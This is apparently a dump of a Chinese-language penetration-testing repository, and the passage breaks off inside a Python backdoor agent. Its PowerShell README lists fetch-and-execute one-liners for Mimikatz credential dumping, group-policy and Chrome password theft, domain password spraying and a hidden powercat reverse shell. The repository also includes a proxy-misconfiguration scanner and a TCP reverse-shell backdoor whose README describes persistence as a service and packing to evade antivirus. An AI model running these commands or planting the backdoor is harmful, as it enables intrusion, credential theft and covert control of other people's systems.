├── PowerShellScripts └── README.md ├── README.md ├── proxyVulnHunter ├── README.md └── proxyVulnHunter.py ├── simple_backdoor_demo ├── README.md ├── agent.py └── server.py └── wifi_security_helper ├── README.md ├── pinger.py ├── port_banner_scan.py └── wifi_helper.py /PowerShellScripts/README.md: -------------------------------------------------------------------------------- 1 | 一些在进行内网、域渗透的时候比较有用、有趣的PowerShell脚本 2 | 3 | - #### [Discover-PSMSSQLServers](https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Discover-PSMSSQLServers) 4 | 此脚本将通过ADSI去发现活动目录林中的MSSQL服务 5 | - `powershell -exec bypass -Command "&{Import-Module .\Discover-PSMSSQLServers.ps1; Discover-PSMSSQLServers}" > C:\Windows\Temp\Discover-PSMSSQLServers.txt` 6 | - `powershell -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PyroTek3/PowerShell-AD-Recon/master/Discover-PSMSSQLServers'); Discover-PSMSSQLServers" > C:\Windows\Temp\Discover-PSMSSQLServers.txt` 7 | 8 | - #### [Discover-PSInterestingServices](https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Discover-PSInterestingServices) 9 | 此脚本将通过LDAP去发现活动目录林中那些令人感兴趣的服务 10 | - `powershell -exec bypass -Command "&{Import-Module .\Discover-PSInterestingServices.ps1; Discover-PSInterestingServices}" > C:\Windows\Temp\Discover-PSInterestingServices.txt` 11 | - `powershell -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PyroTek3/PowerShell-AD-Recon/master/Discover-PSInterestingServices'); Discover-PSInterestingServices" > C:\Windows\Temp\Discover-PSInterestingServices.txt` 12 | 13 | - #### [Discover-PSMSExchangeServers](https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Discover-PSMSExchangeServers) 14 | 此脚本将通过LDAP去发现活动目录林中的Exchange服务器 15 | - `powershell -exec bypass -Command "&{Import-Module .\Discover-PSMSExchangeServers.ps1; Discover-PSMSExchangeServers}" > C:\Windows\Temp\Discover-PSMSExchangeServers.txt` 16 | - `powershell -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PyroTek3/PowerShell-AD-Recon/master/Discover-PSMSExchangeServers'); Discover-PSMSExchangeServers" > C:\Windows\Temp\Discover-PSMSExchangeServers.txt` 17 | 18 | - #### [Find-PSServiceAccounts](https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Find-PSServiceAccounts) 19 | 此脚本将发现AD域或林中的ServicePrincipalName服务账户 20 | - `powershell -exec bypass -Command "&{Import-Module .\Find-PSServiceAccounts.ps1; Find-PSServiceAccounts}" > C:\Windows\Temp\Find-PSServiceAccounts.txt` 21 | - `powershell -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PyroTek3/PowerShell-AD-Recon/master/Find-PSServiceAccounts'); Find-PSServiceAccounts" > C:\Windows\Temp\Find-PSServiceAccounts.txt` 22 | 23 | - #### [Get-DomainKerberosPolicy](https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Get-DomainKerberosPolicy) 24 | 此脚本获取域Kerberos策略,需要安装组策略模块 25 | - `powershell -exec bypass -Command "&{Import-Module .\Get-DomainKerberosPolicy.ps1; Get-DomainKerberosPolicy}" > C:\Windows\Temp\Get-DomainKerberosPolicy.txt` 26 | - `powershell -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PyroTek3/PowerShell-AD-Recon/master/Get-DomainKerberosPolicy'); Get-KerberosPolicy" > C:\Windows\Temp\Get-DomainKerberosPolicy.txt` 27 | 28 | - #### [Get-PSADForestInfo](https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Get-PSADForestInfo) 29 | 此脚本将收集域环境信息 30 | - `powershell -exec bypass -Command "&{Import-Module .\Get-PSADForestInfo.ps1; Get-PSADForestInfo}" > C:\Windows\Temp\Get-PSADForestInfo.txt` 31 | - `powershell -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PyroTek3/PowerShell-AD-Recon/master/Get-PSADForestInfo'); Get-PSADForestInfo" > C:\Windows\Temp\Get-PSADForestInfo.txt` 32 | 33 | - #### [Get-PSADForestKRBTGTInfo](https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Get-PSADForestKRBTGTInfo) 34 | 此脚本将收集所有的KRBTGT账户信息 35 | - `powershell -exec bypass -Command "&{Import-Module .\Get-PSADForestKRBTGTInfo.ps1; Get-PSADForestKRBTGTInfo}" > C:\Windows\Temp\Get-PSADForestKRBTGTInfo.txt` 36 | - `powershell -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PyroTek3/PowerShell-AD-Recon/master/Get-PSADForestKRBTGTInfo'); Get-PSADForestKRBTGTInfo" > C:\Windows\Temp\Get-PSADForestKRBTGTInfo.txt` 37 | 38 | - #### [Get-GPPPassword](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1) 39 | 此脚本即GPP组策略漏洞PowerShell利用脚本,它将在域控上搜索groups.xml、scheduledtasks.xml、services.xml和datasources.xml文件,并返回其中的明文密码 40 | - `powershell -exec bypass -Command "&{Import-Module .\Get-GPPPassword.ps1; Get-GPPPassword}" > C:\Windows\Temp\Get-GPPPassword.txt` 41 | - `powershell -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-GPPPassword.ps1'); Get-GPPPassword" > C:\Windows\Temp\Get-GPPPassword.txt` 42 | 43 | - #### [Get-GPPAutologon](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPAutologon.ps1) 44 | 此脚本将在域控中搜索registry.xml以查找自动登录信息,并返回用户名和密码 45 | - `powershell -exec bypass -Command "&{Import-Module .\Get-GPPAutologon.ps1; Get-GPPAutologon}" > C:\Windows\Temp\Get-GPPAutologon.txt` 46 | - `powershell -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-GPPAutologon.ps1'); Get-GPPAutologon" > C:\Windows\Temp\Get-GPPAutologon.txt` 47 | 48 | - #### [Invoke-Mimikatz](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1) 49 | mimikatz抓密码明文的PowerShell版 50 | - `powershell -exec bypass -Command "&{Import-Module .\Invoke-Mimikatz.ps1; Invoke-Mimikatz -DumpCreds}" > C:\Windows\Temp\Invoke-Mimikatz.txt` 51 | - `powershell -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds" > C:\Windows\Temp\Invoke-Mimikatz.txt` 52 | 53 | - #### [Powerview](https://github.com/ericshoemaker/PowerView/blob/master/Powerview.ps1) 54 | 域信息收集脚本 55 | - Invoke-UserHunter——查找onedomain域中domain admins曾登录过的机器(域内管理员定位) 56 | - `powershell -exec bypass -Command "&{Import-Module .\powerview.ps1; Invoke-UserHunter -Domain 'onedomain'}" > C:\Windows\Temp\onedomainadmins.txt` 57 | - `powershell -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/ericshoemaker/PowerView/master/Powerview.ps1'); Invoke-UserHunter -Domain \"onedomain\"" > C:\Windows\Temp\onedomainadmins.txt` 58 | - Invoke-UserHunter——查找指定someone登录过的机器(域内人员定位) 59 | - `powershell -exec bypass -Command "&{Import-Module .\powerview.ps1; Invoke-UserHunter -UserName \"someone\"}" > C:\Windows\Temp\Someone.txt` 60 | - `powershell -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/ericshoemaker/PowerView/master/Powerview.ps1'); Invoke-UserHunter -UserName \"someone\"" > C:\Windows\Temp\Someone.txt` 61 | - Invoke-UserHunterThreaded——查找指定someone登录过的机器 Invoke-UserHunter的多线程版(域内人员定位) 62 | - `powershell -exec bypass -Command "&{Import-Module .\powerview.ps1; Invoke-UserHunterThreaded -UserName \"someone\"}" > C:\Windows\Temp\someone.txt` 63 | - `powershell -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/ericshoemaker/PowerView/master/Powerview.ps1'); Invoke-UserHunterThreaded -UserName \"someone\"" > C:\Windows\Temp\someone.txt` 64 | - Invoke-StealthUserHunter——查找onedomain域中domain admins共享源机器(session from),其通过检查默认的公共文件服务器上的网络session和SPN记录 65 | - `powershell -exec bypass -Command "&{Import-Module .\powerview.ps1; Invoke-StealthUserHunter -Domain 'onedomain'}" > C:\Windows\Temp\onedomainadmins.txt` 66 | - `powershell -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/ericshoemaker/PowerView/master/Powerview.ps1'); Invoke-StealthUserHunter -Domain \"onedomain\"" > C:\Windows\Temp\onedomainadmins.txt` 67 | - Invoke-StealthUserHunter——查找指定someone共享源机器(session from),其通过检查默认的公共文件服务器上的网络session和SPN记录 68 | - `powershell -exec bypass -Command "&{Import-Module .\powerview.ps1; Invoke-StealthUserHunter -UserName \"someone\"}" > C:\Windows\Temp\someone.txt` 69 | - `powershell -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/ericshoemaker/PowerView/master/Powerview.ps1'); Invoke-StealthUserHunter -UserName \"someone\"" > C:\Windows\Temp\Someone.txt` 70 | - Invoke-Netview——获取域内主机的域信息,每个主机上登录的用户并检索此主机建立的共享会话 71 | - `powershell -exec bypass -Command "&{Import-Module .\powerview.ps1; Invoke-Netview}" > C:\Windows\Temp\netview.txt` 72 | - `powershell -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/ericshoemaker/PowerView/master/Powerview.ps1'); Invoke-Netview" > C:\Windows\Temp\netview.txt` 73 | - Invoke-NetviewThreaded——获取域内主机的域信息,每个主机上登录的用户并检索此主机建立的共享会话 Invoke-Netview的多线程版 74 | - `powershell -exec bypass -Command "&{Import-Module .\powerview.ps1; Invoke-NetviewThreaded}" > C:\Windows\Temp\netview.txt` 75 | - `powershell -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/ericshoemaker/PowerView/master/Powerview.ps1'); Invoke-NetviewThreaded" > C:\Windows\Temp\netviewt.txt` 76 | - Invoke-ShareFinder——查找建立的共享会话 77 | - `powershell -exec bypass -Command "&{Import-Module .\powerview.ps1; Invoke-ShareFinder}" > C:\Windows\Temp\sharefinder.txt` 78 | - `powershell -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/ericshoemaker/PowerView/master/Powerview.ps1'); Invoke-ShareFinder" > C:\Windows\Temp\sharefinder.txt` 79 | - Invoke-ShareFinderThreaded——Invoke-ShareFinderThreaded的多线程版本 80 | - `powershell -exec bypass -Command "&{Import-Module .\powerview.ps1; Invoke-ShareFinderThreaded}" > C:\Windows\Temp\sharefinder.txt` 81 | - `powershell -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/ericshoemaker/PowerView/master/Powerview.ps1'); Invoke-ShareFinderThreaded" > C:\Windows\Temp\sharefinder.txt` 82 | 83 | - #### [Get-ChromeDump](https://github.com/xorrior/RandomPS-Scripts/blob/master/Get-ChromeDump.ps1) 84 | Chrome浏览器历史访问记录和密码Dump脚本 85 | - `powershell -exec bypass -Command "&{Import-Module .\Get-ChromeDump.ps1; Get-ChromeDump -OutFile 'C:\Windows\Temp\ChromeDump.txt'}"` 86 | - `powershell -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/xorrior/RandomPS-Scripts/master/Get-ChromeDump.ps1'); Get-ChromeDump -OutFile 'C:\Windows\Temp\ChromeDump.txt'"` 87 | 88 | - #### [HostEnum](https://github.com/threatexpress/red-team-scripts/blob/master/HostEnum.ps1) 89 | - 枚举本机信息,包括:操作系统详细信息,主机名,正常运行时间,安装日期,已安装的应用程序和补丁,网络适配器配置,网络共享,侦听端口,连接,路由表,DNS缓存,防火墙状态,运行进程和已安装的服务,有趣的注册表项,本地用户/组/管理员 ,个人安全产品状态,杀软进程,通过文件索引编制有趣的文件位置和关键字搜索,有趣的Windows日志(用户登录),浏览器历史记录等,并生成HTML页面以便浏览分析 90 | - `powershell -exec bypass -Command "&{Import-Module .\HostEnum.ps1; Invoke-HostEnum -Local -HTMLReport -Verbose}"` 91 | - `powershell -exec bypass -Command "IEX (new-object net.webclient).DownloadString('https://raw.githubusercontent.com/threatexpress/red-team-scripts/master/HostEnum.ps1'); Invoke-HostEnum -Local -HTMLReport -Verbose"` 92 | - 枚举域内信息 93 | - `powershell -exec bypass -Command "&{Import-Module .\HostEnum.ps1; Invoke-HostEnum -Domain -HTMLReport -Verbose}"` 94 | - `powershell -exec bypass -Command "IEX (new-object net.webclient).DownloadString('https://raw.githubusercontent.com/threatexpress/red-team-scripts/master/HostEnum.ps1');Invoke-HostEnum -Domain -HTMLReport -Verbose"` 95 | 96 | - #### [powercat](https://github.com/besimorhino/powercat/blob/master/powercat.ps1) 97 | PowerShell版本的nc 98 | 反弹shell 99 | - `powershell -exec bypass -Command "&{Import-Module .\powercat.ps1; powercat -c IP -p PORT -e cmd}"` 100 | - `powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c IP -p PORT -e cmd"` 101 | 102 | - #### [DomainPasswordSpray](https://github.com/dafthack/DomainPasswordSpray/blob/master/DomainPasswordSpray.ps1) 103 | 域用户暴力破解脚本 104 | - 使用当前域所有用户和指定密码password进行暴力破解 105 | - `powershell -exec bypass -Command "&{Import-Module .\DomainPasswordSpray.ps1; Invoke-DomainPasswordSpray -Password password}"` 106 | - `powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/master/DomainPasswordSpray.ps1'); Invoke-DomainPasswordSpray -Password password"` 107 | - 使用指定的用户字典文件users.txt和密码字典文件passlist.txt对指定域domain-name进行暴力破解,并输出至指定文件sprayed-creds.txt 108 | - `powershell -exec bypass -Command "&{Import-Module .\DomainPasswordSpray.ps1; Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt}"` 109 | - `powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/master/DomainPasswordSpray.ps1'); Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt"` 110 | 111 | - #### [PowerUp](https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1') 112 | - 发现一些可能被用于权限提升的脆弱点 113 | - `powershell -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks -HTMLReport` -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # PentestScripts 2 | Some scripts for penetration testing 3 | 4 | - [PowerShellScripts](https://github.com/WyAtu/PentestScripts/tree/master/PowerShellScripts) 5 | 6 | 一些在进行内网、域渗透的时候比较有用、有趣的PowerShell脚本 7 | 8 | - [proxyVulnHunter](https://github.com/WyAtu/PentestScripts/tree/master/proxyVulnHunter) 9 | 10 | 一个用于主动寻找由于配置错误导致可能代理进内网的Web服务器(尤其是nginx服务器)的脚本 11 | 12 | - [wifi_security_helper](https://github.com/WyAtu/PentestScripts/tree/master/wifi_security_helper) 13 | 14 | 一些WiFi攻防用的脚本 15 | 16 | - [wifi_helper.py](https://github.com/WyAtu/PentestScripts/blob/master/wifi_security_helper/wifi_helper.py) : 这是一个适用于物理渗透的Aircrack-ng抓包简易使用脚本, 在指定无线网卡和ESSID(或者BSSID, 支持大小写/部分匹配)后, 只需要带着设备靠近待测试WiFi范围, 运行后把它放在口袋/书包里, 或者远程操作(需配合另一脚本), 它将自动抓取握手包(运气好大概只需花费十几秒), 还有记得练习跑步~ 17 | 18 | - [pinger.py](https://github.com/WyAtu/PentestScripts/blob/master/wifi_security_helper/pinger.py) : 发现(WiFi)网络中子网段 19 | 20 | - [port_banner_scan.py](https://github.com/WyAtu/PentestScripts/blob/master/wifi_security_helper/port_banner_scan.py) : 获取开放端口和banner, 如果开放端口运行着Web服务, 脚本还将获取Web页面的Title 21 | 22 | - [simple_backdoor_demo](https://github.com/WyAtu/PentestScripts/tree/master/simple_backdoor_demo) 23 | 一个简易的Python版TCP反弹shell后门 24 | -------------------------------------------------------------------------------- /proxyVulnHunter/README.md: -------------------------------------------------------------------------------- 1 | ### proxyVulnHunter 2 | #### What's proxyVulnHunter 3 | proxyVulnHunter is a script just for finding web servers which may proxy to enter the intranet due to wrong configuration, especially nginx servers, proactively 4 | #### Case 5 | 1. https://sites.google.com/site/testsitehacking/10k-host-header 6 | 2. https://mp.weixin.qq.com/s/EtUmfMxxJjYNl7nIOKkRmA 7 | 3. http://wy.daochuan.net/bug_detail.php?wybug_id=wooyun-2015-0131169 8 | 4. http://www.secevery.com:4321/bugs/wooyun-2014-083202 9 | 5. http://wooyun.jozxing.cc/static/bugs/wooyun-2016-0191121.html 10 | #### Usage 11 | Required 12 | ``` 13 | -t --target, target IP/URL/CIDR 14 | or 15 | -f --file, target file 16 | ``` 17 | Optional 18 | ``` 19 | -p --port, use default ports for the target without port 20 | -o --outfile, output file 21 | -T --thread, thread, default: 100 22 | ``` 23 | `(default ports: 80, 81, 82, 85, 89, 90, 443, 8000, 8001, 8002, 8008, 8080, 8081, 8082, 8088, 8090, 8100, 8108, 8200, 8888, 9000)` 24 | 25 | #### Example 26 | ``` 27 | proxyVulnHunter -t https://www.google.com 28 | proxyVulnHunter -t http://www.google.com 29 | proxyVulnHunter -t www.google.com 30 | proxyVulnHunter -t www.google.com:443 31 | proxyVulnHunter -t 192.168.1.1 32 | proxyVulnHunter -t 192.168.1.1:8080 33 | proxyVulnHunter -t 192.168.2.0/24 -T 200 34 | proxyVulnHunter -t www.google.com:443 www.bing.com 192.168.2.0/24 -o test.txt 35 | proxyVulnHunter -f input.txt -o test.txt 36 | input.txt: 37 | www.google.com:443 38 | www.bing.com 39 | 192.168.2.0/24 40 | https://www.baidu.com 41 | http://www.google.com:80 42 | ... 43 | ``` 44 | if use -p, proxyVulnHunter will check the specified port of targets with the port set and default ports of targets without the port set 45 | 46 | `proxyVulnHunter -t www.google.com:443 www.bing.com 192.168.2.0/24 -o test.txt -p` 47 | 48 | --- 49 | ### proxyVulnHunter 50 | #### 什么是proxyVulnHunter 51 | proxyVulnHunter是一个用于主动寻找由于配置错误导致可能代理进内网的Web服务器(尤其是nginx服务器)的脚本 52 | #### 案例 53 | 1. https://sites.google.com/site/testsitehacking/10k-host-header 54 | 2. https://mp.weixin.qq.com/s/EtUmfMxxJjYNl7nIOKkRmA 55 | 3. http://wy.daochuan.net/bug_detail.php?wybug_id=wooyun-2015-0131169 56 | 4. http://www.secevery.com:4321/bugs/wooyun-2014-083202 57 | 5. http://wooyun.jozxing.cc/static/bugs/wooyun-2016-0191121.html 58 | #### 用法 59 | 必需 60 | ``` 61 | -t --target, 目标IP/URL/CIDR 62 | 或 63 | -f --file, 目标文件 64 | ``` 65 | 可选 66 | ``` 67 | -p --port, 对于没有设置端口的目标使用默认端口 68 | -o --outfile, 输出文件名 69 | -T --thread, 线程, 默认: 100 70 | ``` 71 | `(默认端口: 80, 81, 82, 85, 89, 90, 443, 8000, 8001, 8002, 8008, 8080, 8081, 8082, 8088, 8090, 8100, 8108, 8200, 8888, 9000)` 72 | #### 示例 73 | ``` 74 | proxyVulnHunter -t https://www.google.com 75 | proxyVulnHunter -t http://www.google.com 76 | proxyVulnHunter -t www.google.com 77 | proxyVulnHunter -t www.google.com:443 78 | proxyVulnHunter -t 192.168.1.1 79 | proxyVulnHunter -t 192.168.1.1:8080 80 | proxyVulnHunter -t 192.168.2.0/24 -T 200 81 | proxyVulnHunter -t www.google.com:443 www.bing.com 192.168.2.0/24 -o test.txt 82 | proxyVulnHunter -f input.txt -o test.txt 83 | input.txt: 84 | www.google.com:443 85 | www.bing.com 86 | 192.168.2.0/24 87 | https://www.baidu.com 88 | http://www.google.com:80 89 | ... 90 | ``` 91 | 如果使用-p, 对于设置了端口的目标, proxyVulnHunter将会检测指定端口, 对于未设置端口的目标, proxyVulnHunter将会检测默认端口 92 | 93 | `proxyVulnHunter -t www.google.com:443 www.bing.com 192.168.2.0/24 -o test.txt -p` 94 | 95 | -------------------------------------------------------------------------------- /proxyVulnHunter/proxyVulnHunter.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # 3 | # proxyVulnHunter.py 4 | # Proactively find web servers which may proxy to enter the intranet due to wrong configuration, especially nginx servers 5 | # 6 | # Case: 7 | # 1. https://sites.google.com/site/testsitehacking/10k-host-header 8 | # 2. https://mp.weixin.qq.com/s/EtUmfMxxJjYNl7nIOKkRmA 9 | # 3. http://wy.daochuan.net/bug_detail.php?wybug_id=wooyun-2015-0131169 10 | # 4. http://www.secevery.com:4321/bugs/wooyun-2014-083202 11 | # 5. http://wooyun.jozxing.cc/static/bugs/wooyun-2016-0191121.html 12 | # More: 13 | # https://github.com/WyAtu/PentestScripts/proxyVulnHunter/blob/master/README.md 14 | # 15 | 16 | import sys 17 | import json 18 | import Queue 19 | import socket 20 | import requests 21 | import argparse 22 | import threading 23 | from netaddr import IPNetwork 24 | 25 | timeout = 3 26 | mutex = threading.Lock() 27 | result = [] 28 | web_port = list(set([80, 81, 82, 85, 89, 90, 443, 8000, 8001, 8002, 8008, 8080, 8081, 8082, 8088, 8090, 8100, 8108, 8200, 8888, 9000])) 29 | 30 | def get_ip(): 31 | url = "http://ip.360.cn/IPShare/info" 32 | try: 33 | req = requests.get(url, timeout=timeout) 34 | req_json = json.loads(req.content) 35 | return req_json['ip'] 36 | except: 37 | sys.exit("[-] Can't get ip") 38 | 39 | def get_ip_by_proxy(proxy): 40 | url = "http://ip.360.cn/IPShare/info" 41 | proxies = {'http': 'http://'+proxy, 'https': 'https://'+proxy} 42 | try: 43 | req = requests.get(url, proxies=proxies, timeout=timeout) 44 | req_json = json.loads(req.content) 45 | return req_json['ip'] 46 | except: 47 | return get_ip() 48 | 49 | def get_target_from_file(filename): 50 | target = [] 51 | try: 52 | fp = open(filename, 'r+') 53 | for i in fp.readlines(): 54 | if i.strip() != "": target.append(i.strip()) 55 | fp.close() 56 | return target 57 | except: 58 | sys.exit('[-] Load file error') 59 | 60 | def format_ip_dict(ip_dict): 61 | for target, ip in ip_dict.items(): 62 | if isinstance(ip, list): 63 | map(lambda x: q.put(x), [target+'--'+i for i in ip]) 64 | else: 65 | q.put(target+'--'+ip) 66 | 67 | def format_input(target): 68 | target_re = target.replace('http://', '').replace('https://', '').rstrip('/') 69 | try: 70 | if args.port == False: 71 | ip_list = [ip.format() for ip in IPNetwork(target_re)] 72 | else: 73 | ip_list = sum(([[ip+':'+str(port) if ':' not in ip else ip_list.append(ip) for port in web_port] for ip in [ip.format() for ip in IPNetwork(target_re)]]), []) 74 | except: 75 | try: 76 | url, port = target_re.split(':') 77 | ip = socket.gethostbyname(url) 78 | ip_list = ip+':'+port 79 | except: 80 | try: 81 | ip = socket.gethostbyname(target_re) 82 | if args.port == True and ':' not in ip: 83 | ip_list = [ip+':'+str(port) for port in web_port] 84 | else: 85 | ip_list = ip 86 | except: 87 | ip_list = "" 88 | return {target : ip_list} 89 | 90 | def checker(): 91 | while not q.empty(): 92 | try: 93 | target, ip = q.get().split('--') 94 | result_print = "[*] %s--%s is not proxy"%(target, ip) if ip == "" or get_ip() == get_ip_by_proxy(ip) \ 95 | else "[+] %s--%s is a proxy"%(target, ip) 96 | mutex.acquire() 97 | print result_print 98 | if '[+]' in result_print: 99 | try: 100 | fp.writelines(target+'--'+ip+'\n') 101 | fp.flush() 102 | except: 103 | pass 104 | result.append(target+'--'+ip) 105 | mutex.release() 106 | except: 107 | pass 108 | finally: 109 | q.task_done() 110 | 111 | if __name__ == "__main__": 112 | parser = argparse.ArgumentParser(description='%s'%(sys.argv[0])) 113 | exptypegroup = parser.add_mutually_exclusive_group() 114 | exptypegroup.add_argument('-t', '--target', type=str, nargs='+', help="target IP/URL/CIDR") 115 | exptypegroup.add_argument('-f', '--file', type=str, help="target file") 116 | parser.add_argument('-p', '--port', action='store_true', help="use default ports for the target without port") 117 | parser.add_argument('-o', '--output', type=str, help="output file") 118 | parser.add_argument('-T', '--thread', type=int, default=100, help="thread, default: 100") 119 | args = parser.parse_args() 120 | 121 | if len(sys.argv) < 2: 122 | sys.exit(parser.print_help()) 123 | if args.target == None and args.file == None: 124 | sys.exit('[-] use -t/--target or -f/--file to set target, -h to show help') 125 | 126 | target = get_target_from_file(args.file) if args.file != None else args.target 127 | 128 | if args.output != None: 129 | try: 130 | fp = open(args.output, 'a+') 131 | except: 132 | sys.exit('[-] open output file failed') 133 | 134 | ip_dict_list = map(format_input, target) 135 | 136 | q = Queue.Queue() 137 | map(format_ip_dict, ip_dict_list) 138 | 139 | threads = [threading.Thread(target=checker) for i in range(args.thread)] 140 | map(lambda x: x.start(), threads) 141 | q.join() 142 | map(lambda x: sys.stdout.write(x+'\n'), result) 143 | try: 144 | fp.close() 145 | except: 146 | pass 147 | -------------------------------------------------------------------------------- /simple_backdoor_demo/README.md: -------------------------------------------------------------------------------- 1 | 这是一个简易的TCP反弹shell后门 2 | 3 | 使用上有些类似于msf的session 4 | 5 | 它可以监听多个端口,可以接收多个socket连接,可以避免一些命令导致的异常退出,可以避免触发杀软后直接导致主进程被杀,再次监听后能重新上线,可以避免长时间执行无果的命令,兼容Linux/Windows,客户端在运行后可以一直等待服务端启动监听,并在用户退出后还能再次连接 6 | 7 | 以服务形式并设置开机启动即可作为一个持久化后门使用 8 | 9 | 在windows平台上运行,可以用pyinstaller打包成exe或者pyarmor混淆再打包成exe,免杀效果还不错 10 | 11 | 最早发布在[secquan.org](https://www.secquan.org/Share/1068502)上 12 | -------------------------------------------------------------------------------- /simple_backdoor_demo/agent.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | 4 | import sys 5 | import socket 6 | import platform 7 | from getpass import getuser 8 | from time import time, sleep 9 | from subprocess import Popen 10 | from tempfile import TemporaryFile 11 | 12 | def get_input(): 13 | if len(sys.argv) <3 or len(sys.argv) > 4: 14 | sys.exit('[-] Usage: %s reverse_ip/domain reverse_port [remark]'%(sys.argv[0])) 15 | try: 16 | host = socket.gethostbyname(sys.argv[1]) 17 | port = int(sys.argv[2]) 18 | remark = str(sys.argv[3]) 19 | except socket.gaierror: 20 | sys.exit('[-] reverse_ip/domain %s error'%(sys.argv[1])) 21 | except ValueError: 22 | sys.exit('[-] port must be a int number') 23 | except IndexError: 24 | remark = "" 25 | except: 26 | sys.exit('[-] Usage: %s reverse_ip/domain reverse_port [remark]'%(sys.argv[0])) 27 | return host, port, remark 28 | 29 | def get_host_info(remark, port): 30 | global TIMEOUT 31 | hostname = system = ips = user = arch = "" 32 | try: 33 | hostname = str(platform.node()) 34 | system = str(platform.platform()) 35 | arch = str(platform.machine()) 36 | user = getuser() 37 | ips = " ".join(socket.gethostbyname_ex(socket.gethostname())[2]) 38 | except: 39 | hostname = "can't get hostname" if hostname == "" else hostname 40 | system = "can't get platform" if system == "" else system 41 | arch = "can't get arch" if arch == "" else arch 42 | user = "can't get user" if user == "" else user 43 | ips = "can't get ips" if ips == "" else ips 44 | return "%s---%s---%s---%s---%s---%s---%d---%d"%(hostname, system, arch, user, ips, remark, TIMEOUT, port) 45 | 46 | def establish_connection(host, port, host_info): 47 | global CONN_FLAG 48 | try: 49 | conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 50 | conn.connect((host, int(port))) 51 | CONN_FLAG = 1 52 | conn.send(str(len(host_info)).zfill(16)+host_info) 53 | return conn 54 | except: 55 | CONN_FLAG = 0 56 | sleep(5) 57 | 58 | def run_command(conn, command): 59 | global TIMEOUT 60 | temp_out = TemporaryFile(mode='w+') 61 | fileno = temp_out.fileno() 62 | p = Popen(command, shell=True, stdout=fileno, stderr=fileno) 63 | start_time = time() 64 | while p.poll() == None: 65 | if time() > start_time + TIMEOUT: 66 | temp_out.seek(0) 67 | result = temp_out.read() 68 | temp_out.close() 69 | break 70 | if 'closed' not in str(temp_out): 71 | temp_out.seek(0) 72 | result = temp_out.read() 73 | temp_out.close() 74 | conn.send(str(len(result)).zfill(16)+result) 75 | 76 | if __name__=="__main__": 77 | CONN_FLAG = 0 78 | EXIT_FLAG = 0 79 | TIMEOUT = 5 80 | 81 | host, port, remark = get_input() 82 | host_info = get_host_info(remark, port) 83 | 84 | while not EXIT_FLAG: 85 | conn = establish_connection(host, port, host_info) 86 | while CONN_FLAG: 87 | try: 88 | command = str(conn.recv(1024)) 89 | if command == "killsession()": 90 | EXIT_FLAG = 1 91 | break 92 | elif command == "info()": 93 | host_info = get_host_info(remark, port) 94 | conn.send(str(len(host_info)).zfill(16)+host_info) 95 | elif command.startswith("set timeout "): 96 | try: 97 | TIMEOUT = int(command.split()[2]) 98 | result = "[+] TIMEOUT has been set to %d"%(TIMEOUT) 99 | except: 100 | result = "[-] set timeout TIMEOUT, TIMEOUT should be an integer number" 101 